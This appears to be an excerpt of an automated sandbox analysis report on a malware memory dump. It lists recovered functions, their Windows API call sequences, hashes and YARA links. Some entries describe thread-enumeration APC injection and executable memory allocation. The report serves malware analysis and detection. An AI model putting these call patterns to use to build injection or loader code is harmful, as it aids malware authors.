Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
String ID:
API String ID: 194907169-0
Opcode ID: 5bc306a994394e8ddbbc64bda656c67a58253a5a2e9a893b3a32820d14d3c8b8
Instruction ID: 749b6636324c102d6b3a9d5158d9da087219f38c7dbe6f1fa3cef0ba1ac2fd73
Opcode Fuzzy Hash: 5bc306a994394e8ddbbc64bda656c67a58253a5a2e9a893b3a32820d14d3c8b8
Instruction Fuzzy Hash: B02115B5904608FFDB10AFA6DCC8A9EBFBCFB04354F108469F916E6260E7349A548F50

Uniqueness

Uniqueness Score: -1.00%

Function 033516D2, Relevance: 15.1, APIs: 10, Instructions: 68threadprocesslibraryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(0335683A,?,00000000,00000000,0334B0B2,00000000,00000000,00000000,00000000,74E5F5B0,0335683A), ref: 033516F8
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 03351704
GetModuleHandleA.KERNEL32(?,0644978E,?,00000000,00000000), ref: 03351724
GetProcAddress.KERNEL32(00000000), ref: 0335172B
Thread32First.KERNEL32(0335683A,0000001C), ref: 0335173B
OpenThread.KERNEL32(001F03FF,00000000,00000000), ref: 03351756
QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 03351767
CloseHandle.KERNEL32(00000000), ref: 0335176E
Thread32Next.KERNEL32(0335683A,0000001C), ref: 03351777
CloseHandle.KERNEL32(0335683A), ref: 03351783

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
String ID:
API String ID: 2341152533-0
Opcode ID: 52f27bf1386f6787c311f96c2a6c85b2e35c4ea6e4d16d66899f1d1fbfbbe313
Instruction ID: 4300cbc4201dfd098702d7913074695b38e6d0cb796c32c977293ddd0289348d
Opcode Fuzzy Hash: 52f27bf1386f6787c311f96c2a6c85b2e35c4ea6e4d16d66899f1d1fbfbbe313
Instruction Fuzzy Hash: 4A214A76900118FFDF11EFA4DCC8EAEBBBDEB08351F044125FA01E6154D77199559B60

Uniqueness

Uniqueness Score: -1.00%

Function 03367C17, Relevance: 15.1, APIs: 10, Instructions: 59sleepsynchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?,0334F0A9), ref: 03367C2C

Part of subcall function 0335D0D5: InterlockedExchange.KERNEL32(0335162A,000000FF), ref: 0335D0DC

WaitForSingleObject.KERNEL32(?,000000FF,?,?,0334F0A9), ref: 03367C4C
CloseHandle.KERNEL32(00000000,?,0334F0A9), ref: 03367C55
CloseHandle.KERNEL32(?,?,?,0334F0A9), ref: 03367C5F
RtlEnterCriticalSection.NTDLL(?), ref: 03367C67
RtlLeaveCriticalSection.NTDLL(?), ref: 03367C7F
Sleep.KERNEL32(000001F4), ref: 03367C8E
CloseHandle.KERNEL32(?), ref: 03367C9B
LocalFree.KERNEL32(?), ref: 03367CA6
RtlDeleteCriticalSection.NTDLL(?), ref: 03367CB0

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
String ID:
API String ID: 1408595562-0
Opcode ID: d5bdeafddba83c16ee3ad73955e8f481a41f396d2247f2da52e44fae1aafdab2
Instruction ID: 2c1994bfbbf91b76c642eb22d248d01fd1b9fcc458ea250aab1cd9e9f37fa4af
Opcode Fuzzy Hash: d5bdeafddba83c16ee3ad73955e8f481a41f396d2247f2da52e44fae1aafdab2
Instruction Fuzzy Hash: 84113675504B16EFCB30BB66DCC895AFBBCAF04759B448918F5A2C2558DB39E4418F20

Uniqueness

Uniqueness Score: -1.00%

Function 0336715A, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89memorystringpipeCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(033494DB,00000000,?,?,?,?,033494DB,00000035,00000000,?,00000000), ref: 0336718A
RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 033671A0
memcpy.NTDLL(00000010,033494DB,00000000,?,?,033494DB,00000035,00000000), ref: 033671D6
memcpy.NTDLL(00000010,00000000,00000035,?,?,033494DB,00000035), ref: 033671F1
CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 0336720F
GetLastError.KERNEL32(?,?,033494DB,00000035), ref: 03367219
HeapFree.KERNEL32(00000000,00000000,?,?,033494DB,00000035), ref: 0336723C

Strings

(, xrefs: 03367223

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
String ID: (
API String ID: 2237239663-3887548279
Opcode ID: 3e824322dc78307665c01b835c900fc0a06bdbf9ec31930d711ea6946d1b0cef
Instruction ID: 3ca15e4e26177798189664d2d51473aba08c135b10cd9c570490db193b078efe
Opcode Fuzzy Hash: 3e824322dc78307665c01b835c900fc0a06bdbf9ec31930d711ea6946d1b0cef
Instruction Fuzzy Hash: B631A07690030AEFCB20DFA5DCC4AABBBBDFB04314F048429F946D2214D3349A55CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03356BBB, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 03356BD6
RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 03356C8E

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 03356C24
GetProcAddress.KERNEL32(00000000,?), ref: 03356C3D
GetLastError.KERNEL32(?,00000008,?,00000001), ref: 03356C5C
FreeLibrary.KERNEL32(00000000,?,00000008,?,00000001), ref: 03356C6E
GetLastError.KERNEL32(?,00000008,?,00000001), ref: 03356C76

Strings

Software\Microsoft\WAB\DLLPath, xrefs: 03356BC7

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
String ID: Software\Microsoft\WAB\DLLPath
API String ID: 1628847533-3156921957
Opcode ID: e0c56e8df2c17736d5c197742c1912618633c9250eaf59d694adbe9de8b813cf
Instruction ID: 94192a15871b1359af8396c818622e6c281380b7175457fdcb5496c2dd1bed95
Opcode Fuzzy Hash: e0c56e8df2c17736d5c197742c1912618633c9250eaf59d694adbe9de8b813cf
Instruction Fuzzy Hash: 74217C76900218FFCB22EBA9DDC9CAEBBBCEB88350B545165FC12A6114E7315E40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 03352790, Relevance: 13.6, APIs: 9, Instructions: 110stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,00000000,?,?,?), ref: 033527A7
lstrlen.KERNEL32(?), ref: 033527AF
lstrlen.KERNEL32(?), ref: 0335281A
RtlAllocateHeap.NTDLL(00000000,?), ref: 03352845
memcpy.NTDLL(00000000,00000002,?), ref: 03352856
memcpy.NTDLL(00000000,?,?), ref: 0335286C
memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 0335287E
memcpy.NTDLL(00000000,0336B3F8,00000002,00000000,?,?,00000000,?,?), ref: 03352891
memcpy.NTDLL(00000000,?,00000002), ref: 033528A6

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: memcpy$lstrlen$AllocateHeap
String ID:
API String ID: 3386453358-0
Opcode ID: 32618a3420254deafeb0a626a051c5a370254e64519534acdad94810bce03894
Instruction ID: 4621e5d0326e3a5f43aa2297403a23d4455f52cd4444bf7ffd1e0fcb1d8d6ee7
Opcode Fuzzy Hash: 32618a3420254deafeb0a626a051c5a370254e64519534acdad94810bce03894
Instruction Fuzzy Hash: 2A412876D0021AEFCF11DFA9CC80A9EBBB8EF58214F144456ED15E7215E771AA50CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03352066, Relevance: 13.6, APIs: 9, Instructions: 109memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0335F194: RtlEnterCriticalSection.NTDLL(03371488), ref: 0335F19C
Part of subcall function 0335F194: RtlLeaveCriticalSection.NTDLL(03371488), ref: 0335F1B1
Part of subcall function 0335F194: InterlockedIncrement.KERNEL32(0000001C), ref: 0335F1CA

RtlAllocateHeap.NTDLL(00000000,0335EC72,00000000), ref: 033520B7
lstrlen.KERNEL32(00000008,?,?,?,0335EC72,00000000), ref: 033520C6
RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 033520D8
HeapFree.KERNEL32(00000000,00000000,?,?,?,0335EC72,00000000), ref: 033520E8
memcpy.NTDLL(00000000,00000000,0335EC72,?,?,?,0335EC72,00000000), ref: 033520FA
lstrcpy.KERNEL32(00000020), ref: 0335212C
RtlEnterCriticalSection.NTDLL(03371488), ref: 03352138
RtlLeaveCriticalSection.NTDLL(03371488), ref: 03352190

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
String ID:
API String ID: 3746371830-0
Opcode ID: 0847cbe9a4d5ad0efc90c617c715bec564fbc5c364e3f90f83d925893798f7ea
Instruction ID: 8c0156cfbcf4b593f4b24cf46bddbefbd275ebe85802c3eee2c08e55f9a7a06f
Opcode Fuzzy Hash: 0847cbe9a4d5ad0efc90c617c715bec564fbc5c364e3f90f83d925893798f7ea
Instruction Fuzzy Hash: 68413276900B05EFDB21EF65C8C4B5BBBB8FB08310F148919F91997210DB74EA90CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03342C02, Relevance: 13.6, APIs: 9, Instructions: 105memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0334257D: RtlAllocateHeap.NTDLL(00000000,?), ref: 033425AF
Part of subcall function 0334257D: HeapFree.KERNEL32(00000000,00000000), ref: 033425D4

Part of subcall function 0335A5E4: HeapFree.KERNEL32(00000000,00000000,?,?,?,00000000,?,03342C3F,?,?,?), ref: 0335A620
Part of subcall function 0335A5E4: HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00000000,?,03342C3F,?,?,?), ref: 0335A673

lstrlen.KERNEL32(00000000,?,?,?), ref: 03342C74
lstrlen.KERNEL32(?,?,?,?), ref: 03342C7C
lstrlen.KERNEL32(?), ref: 03342C86
RtlAllocateHeap.NTDLL(00000000,?), ref: 03342C9B
wsprintfA.USER32 ref: 03342CD7
HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 03342CF6
HeapFree.KERNEL32(00000000,?), ref: 03342D0B
HeapFree.KERNEL32(00000000,?), ref: 03342D18
HeapFree.KERNEL32(00000000,?,?,?,?), ref: 03342D26

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heap$Free$lstrlen$Allocate$wsprintf
String ID:
API String ID: 168057987-0
Opcode ID: 51fea67a3ef6a7d92109780bda86a377aba0313b5b409f753f0165f066d49909
Instruction ID: f857e771892093b3f6def3d3fe5ea0e88fdebd81e805ae6343d2441e9af3f169
Opcode Fuzzy Hash: 51fea67a3ef6a7d92109780bda86a377aba0313b5b409f753f0165f066d49909
Instruction Fuzzy Hash: 2331DE36A04315AFCB21EF61DC84E5BBBEDEF88314F00492AF954E6260D77598148FA2

Uniqueness

Uniqueness Score: -1.00%

Function 0335AA30, Relevance: 13.6, APIs: 9, Instructions: 89filesynchronizationCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,0000FDE9,00000000,00000001,00000080,00000000,00000008,00000000,0000FDE9,?), ref: 0335AA70
GetLastError.KERNEL32 ref: 0335AA7A
WaitForSingleObject.KERNEL32(000000C8), ref: 0335AA9F
CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 0335AAC2
SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 0335AAEA
WriteFile.KERNEL32(00000001,00001388,?,?,00000000), ref: 0335AAFF
SetEndOfFile.KERNEL32(00000001), ref: 0335AB0C
GetLastError.KERNEL32 ref: 0335AB18
CloseHandle.KERNEL32(00000001), ref: 0335AB24

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
String ID:
API String ID: 2864405449-0
Opcode ID: 8f5c50d7c3ec5255c8a2945a8b759fab178e7b58602feac0c1cbe7686086bc28
Instruction ID: d17206a4944a7c76bc3780734d4d768a69da682616949b264405b13ba647c9c6
Opcode Fuzzy Hash: 8f5c50d7c3ec5255c8a2945a8b759fab178e7b58602feac0c1cbe7686086bc28
Instruction Fuzzy Hash: 46316D71900208BFEB21DFA5DD89FAEBFB8EB04325F148250F961E60A0D7744A54AF90

Uniqueness

Uniqueness Score: -1.00%

Function 0334B790, Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,0334C269,00000008,?,00000010,00000001,00000000,0000003A,?,?), ref: 0334B7AF
WriteFile.KERNEL32(00000001,00000001,?,?,?), ref: 0334B7E3
ReadFile.KERNEL32(00000001,00000001,?,?,?), ref: 0334B7EB
GetLastError.KERNEL32 ref: 0334B7F5
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00002710), ref: 0334B811
GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 0334B82A
CancelIo.KERNEL32(?), ref: 0334B83F
CloseHandle.KERNEL32(?), ref: 0334B84F
GetLastError.KERNEL32 ref: 0334B857

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
String ID:
API String ID: 4263211335-0
Opcode ID: e16736b90e3847308185264bf00b7c0c2ad5cab01e0bea8380c8ee9193c4b765
Instruction ID: 72ee8d2ba7b319e9d4496b54ac1076accd413710d84d7d3a7477a7be159b0e57
Opcode Fuzzy Hash: e16736b90e3847308185264bf00b7c0c2ad5cab01e0bea8380c8ee9193c4b765
Instruction Fuzzy Hash: A4215A32900218BFCB01AFA5DCC88EEBBBDEF48311F008026F956D6145D7309654CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0335D448, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(0335683A,?,00000000,0335683A,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,0334B059,00000000,74E5F5B0,0335683A), ref: 0335D454
_aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 0335D46A
_snwprintf.NTDLL ref: 0335D48F
CreateFileMappingW.KERNEL32(000000FF,03371248,00000004,00000000,00001000,?), ref: 0335D4AB
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 0335D4BD
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 0335D4D4
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 0335D4F5
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 0335D4FD

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: 93b68f2b9f3bc196a94c18cfc763a3703c56c1cf8952fd50089c24427ebc8648
Instruction ID: 524a2259f8f844b89e366de331e466df6a309832ba66dcf77a07be4568a70647
Opcode Fuzzy Hash: 93b68f2b9f3bc196a94c18cfc763a3703c56c1cf8952fd50089c24427ebc8648
Instruction Fuzzy Hash: CB21E7B6A40204FFC721EF64DC85F9EBBACAB44710F158020FA15EB2D4EB70A5458B50

Uniqueness

Uniqueness Score: -1.00%

Function 0335316B, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 191stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,?,06449A03,?,?,06449A03,?,?,06449A03,?,?,06449A03,?,00000000,00000000,00000000), ref: 03353269
lstrcpyW.KERNEL32(00000000,?), ref: 0335328C
lstrcatW.KERNEL32(00000000,00000000), ref: 03353294
lstrlenW.KERNEL32(00000000,?,06449A03,?,?,06449A03,?,?,06449A03,?,?,06449A03,?,?,06449A03,?), ref: 033532DF
memcpy.NTDLL(00000000,?,00000008,00000006,?,?,?,0335EFEE,?), ref: 03353347
LocalFree.KERNEL32(?,00000006,?,?,?,0335EFEE,?), ref: 03353360

Strings

P, xrefs: 033531E4

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
String ID: P
API String ID: 3649579052-3110715001
Opcode ID: bb00846b921888ce58b4ca04b0ec94332df480c1131dc6896d4736cb8ffb5304
Instruction ID: 921079533f3283dda3512121b0976cdab56e7a4bdc032fa30c4690eedd837d8b
Opcode Fuzzy Hash: bb00846b921888ce58b4ca04b0ec94332df480c1131dc6896d4736cb8ffb5304
Instruction Fuzzy Hash: 45613F7AD0021AAFCF21EFA5DCC4EAEBBBDEB44350B084025F905AB250D7349A45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0334F363, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 148timestringCOMMON

Download Yara Rule

APIs

Part of subcall function 033604F0: InterlockedIncrement.KERNEL32(76929BD8), ref: 03360541
Part of subcall function 033604F0: RtlLeaveCriticalSection.NTDLL(00000000), ref: 033605CC

OpenProcess.KERNEL32(00000410,1D1D1D1D,03367DD4,76929BC0,00000000,03367DD4,0000001C,00000000,00000000,?,?,?,03367DD4), ref: 0334F3BD
CloseHandle.KERNEL32(00000000,00000000,00000000,03367DE4,00000104,?,?,?,03367DD4), ref: 0334F3DB
GetSystemTimeAsFileTime.KERNEL32(03367DD4), ref: 0334F443
lstrlenW.KERNEL32(36B0D815), ref: 0334F4B8
GetSystemTimeAsFileTime.KERNEL32(00000008,0000001A), ref: 0334F4D4
memcpy.NTDLL(00000014,36B0D815,00000002), ref: 0334F4EC

Part of subcall function 03367E77: RtlLeaveCriticalSection.NTDLL(?), ref: 03367EF4

Strings

o, xrefs: 0334F4A9

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Time$CriticalFileLeaveSectionSystem$CloseHandleIncrementInterlockedOpenProcesslstrlenmemcpy
String ID: o
API String ID: 2541713525-252678980
Opcode ID: c2e42f512565ad1401661efdb19dbcb26c4bcb8b4766a15622db93596920f8e1
Instruction ID: ee5dd0c65adb738b3b58f60d481d6939b0c51634277fa80e35b800c6dc8bf947
Opcode Fuzzy Hash: c2e42f512565ad1401661efdb19dbcb26c4bcb8b4766a15622db93596920f8e1
Instruction Fuzzy Hash: B5518B71A44706AFD720EF64D8C8BAAB7ECFF04304F184529EA05D7654EB74F9808B94

Uniqueness

Uniqueness Score: -1.00%

Function 033642A9, Relevance: 12.1, APIs: 8, Instructions: 123memoryregistrysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0334B8B7: RegCreateKeyA.ADVAPI32(80000001,0644B7F0,?), ref: 0334B8CC
Part of subcall function 0334B8B7: lstrlen.KERNEL32(0644B7F0,00000000,00000000,00000000,?,?,?,03344C3E,00000000,?,7673D3B0,74E05520,?,?,?,03341F86), ref: 0334B8F5

RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 033642EE
RtlAllocateHeap.NTDLL(00000000,00000105), ref: 03364306
HeapFree.KERNEL32(00000000,74E5F5B0,?,?,00000000,0334B109,00000000,74E5F5B0,0335683A), ref: 03364368
RtlAllocateHeap.NTDLL(00000000,0335683A), ref: 0336437C
WaitForSingleObject.KERNEL32(00000000,?,?,00000000,0334B109,00000000,74E5F5B0,0335683A), ref: 033643CE
HeapFree.KERNEL32(00000000,74E5F5B0,?,?,00000000,0334B109,00000000,74E5F5B0,0335683A), ref: 033643F7
HeapFree.KERNEL32(00000000,?,?,?,00000000,0334B109,00000000,74E5F5B0,0335683A), ref: 03364407
RegCloseKey.ADVAPI32(?,?,?,00000000,0334B109,00000000,74E5F5B0,0335683A), ref: 03364410

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
String ID:
API String ID: 3503961013-0
Opcode ID: 4a88b8b1129dc61244bbe650218ab0118949ea3e06646c2affe49ba9f15e1bf7
Instruction ID: 6e451a643c952437b3add00d814e3c28324f5950fb34c2079d3e2adc2a9d7dd9
Opcode Fuzzy Hash: 4a88b8b1129dc61244bbe650218ab0118949ea3e06646c2affe49ba9f15e1bf7
Instruction Fuzzy Hash: 4041A5B6C01219EFDF11EF96DCC48AEBB7DFB48308F24846AE511A2124D3354A949F61

Uniqueness

Uniqueness Score: -1.00%

Function 0334B2BF, Relevance: 12.1, APIs: 8, Instructions: 112stringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0334ACC7), ref: 0334B2D5
wsprintfA.USER32 ref: 0334B2FD
lstrlen.KERNEL32(?), ref: 0334B30C

Part of subcall function 03360757: HeapFree.KERNEL32(00000000,00000000,033529D3,00000000), ref: 03360763

wsprintfA.USER32 ref: 0334B34C
wsprintfA.USER32 ref: 0334B381
memcpy.NTDLL(00000000,?,?), ref: 0334B38E
memcpy.NTDLL(00000008,0336B3F8,00000002,00000000,?,?), ref: 0334B3A3
wsprintfA.USER32 ref: 0334B3C6

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
String ID:
API String ID: 2937943280-0
Opcode ID: c4b136a0aa098c65b0e5664e75ff3ca0364c5e6f7ee140b96185bf2a24da7448
Instruction ID: c5e8246bc4112a2359c9d49fc78ccf2c0469421f7db324ac6941b46364ed5bd7
Opcode Fuzzy Hash: c4b136a0aa098c65b0e5664e75ff3ca0364c5e6f7ee140b96185bf2a24da7448
Instruction Fuzzy Hash: 9C41FA76A00209EFDB10DB99D8D4EAAB7FCEF44308B148455E559E7211EB70EA05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03357F16, Relevance: 12.1, APIs: 8, Instructions: 72memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,03351FB1,?,?,?,?), ref: 03357F3A
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 03357F4C
wcstombs.NTDLL ref: 03357F5A
lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,03351FB1,?,?,?), ref: 03357F7E
RtlAllocateHeap.NTDLL(00000000,00000002), ref: 03357F93
mbstowcs.NTDLL ref: 03357FA0
HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,03351FB1,?,?,?,?,?), ref: 03357FB2
HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,03351FB1,?,?,?,?,?), ref: 03357FCC

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
String ID:
API String ID: 316328430-0
Opcode ID: 080f8e3933ff5944b2c694524f247bdcc4d20933109b6133c174719728e36dbc
Instruction ID: 73dae1a48d6dcbda3fc6b2b2811abc9a444997ad9a8a5bcd5d85284735345c7b
Opcode Fuzzy Hash: 080f8e3933ff5944b2c694524f247bdcc4d20933109b6133c174719728e36dbc
Instruction Fuzzy Hash: 67214C31900209FFDF21AF65DC89E5EBF7DEB44304F148125F914D1160D77599649FA0

Uniqueness

Uniqueness Score: -1.00%

Function 03343B36, Relevance: 11.5, APIs: 9, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e22f51a7edf68272f0bedad5660cd8e5e98387cdab2616cb10d86f0a17a80533
Instruction ID: eba56e88b411d4fc7a43cc38b1ad374c839a2bfe548c0e7100fc625ee6dc2628
Opcode Fuzzy Hash: e22f51a7edf68272f0bedad5660cd8e5e98387cdab2616cb10d86f0a17a80533
Instruction Fuzzy Hash: 17A1E679D00209EFDF26EF94CC84AEEBBB9FF05324F188465E511A6160D731AAA5DF10

Uniqueness

Uniqueness Score: -1.00%

Function 03342717, Relevance: 10.7, APIs: 7, Instructions: 165stringmemoryCOMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32(0336D5D0,00000038,0334B052,00000000,74E5F5B0,0335683A,?,?,?,?,?,?,?,033477C7,?), ref: 03342728
StrChrA.SHLWAPI(00000000,00000020,?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 03342739

Part of subcall function 03341BC9: lstrlen.KERNEL32(?,00000000,74E06980,00000000,0335C55F,?), ref: 03341BD2
Part of subcall function 03341BC9: memcpy.NTDLL(00000000,?,00000000,?), ref: 03341BF5
Part of subcall function 03341BC9: memset.NTDLL ref: 03341C04

ExitProcess.KERNEL32 ref: 0334291B

Part of subcall function 033655C4: StrChrA.SHLWAPI(?,?,7673D3B0,0644C0D4,00000000,?,033541F5,?,00000020,0644C0D4), ref: 033655E9
Part of subcall function 033655C4: StrTrimA.SHLWAPI(?,0336D49C,00000000,?,033541F5,?,00000020,0644C0D4), ref: 03365608
Part of subcall function 033655C4: StrChrA.SHLWAPI(?,?,?,033541F5,?,00000020,0644C0D4), ref: 03365614

lstrcmp.KERNEL32(?,?), ref: 033427A7
VirtualAlloc.KERNEL32(00000000,0000FFFF,00001000,00000040,?,?,?,?,?,?,?,033477C7,?), ref: 033427BF

Part of subcall function 0335B986: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,0644B7F0,?,?,0334B905,0000003A,0644B7F0,?,?,?,03344C3E,00000000,?), ref: 0335B9C6
Part of subcall function 0335B986: CloseHandle.KERNEL32(000000FF,?,?,0334B905,0000003A,0644B7F0,?,?,?,03344C3E,00000000,?,7673D3B0,74E05520), ref: 0335B9D1

VirtualFree.KERNEL32(?,00000000,00008000,0000004B,00000000,00000000,-00000020,?,?,?,?,?,?,?,033477C7,?), ref: 03342831
lstrcmp.KERNEL32(?,?), ref: 0334284A

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Virtuallstrcmp$AllocCloseCommandErrorExitFreeHandleLastLineProcessTrimlstrlenmemcpymemset
String ID:
API String ID: 739714153-0
Opcode ID: f445e11da66820b4fb0a687839942f8256b9e776eef9c871b5be970b0eeb73ed
Instruction ID: 119dda1354495c5a9498cada4f3c3ab6a6dc961c2cb0099d6f9237eaa3c1ef20
Opcode Fuzzy Hash: f445e11da66820b4fb0a687839942f8256b9e776eef9c871b5be970b0eeb73ed
Instruction Fuzzy Hash: 0A513675D10219AFDB25EBA1CCC4EEEBBB8EF08701F084865F501FA154DB35A945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0335CA13, Relevance: 10.6, APIs: 7, Instructions: 126memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,00000000,77624620,?,00000001,00000001,?,03357F77,?,?,?,?,?,00000000), ref: 0335CA6D
lstrlen.KERNEL32(?,?,00000000,77624620,?,00000001,00000001,?,03357F77,?,?,?,?,?,00000000), ref: 0335CA8B
RtlAllocateHeap.NTDLL(00000000,74E06985,?), ref: 0335CAB7
memcpy.NTDLL(00000000,00000000,00000000,?,00000001,00000001,?,03357F77,?,?,?,?,?,00000000), ref: 0335CACE
HeapFree.KERNEL32(00000000,00000000), ref: 0335CAE1
memcpy.NTDLL(00000000,?,?,?,00000001,00000001,?,03357F77,?,?,?,?,?,00000000), ref: 0335CAF0
HeapFree.KERNEL32(00000000,00000000,?,?,?,00000000,77624620,?,00000001,00000001,?,03357F77,?,?,?,?), ref: 0335CB54

Part of subcall function 03367E77: RtlLeaveCriticalSection.NTDLL(?), ref: 03367EF4

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
String ID:
API String ID: 1635816815-0
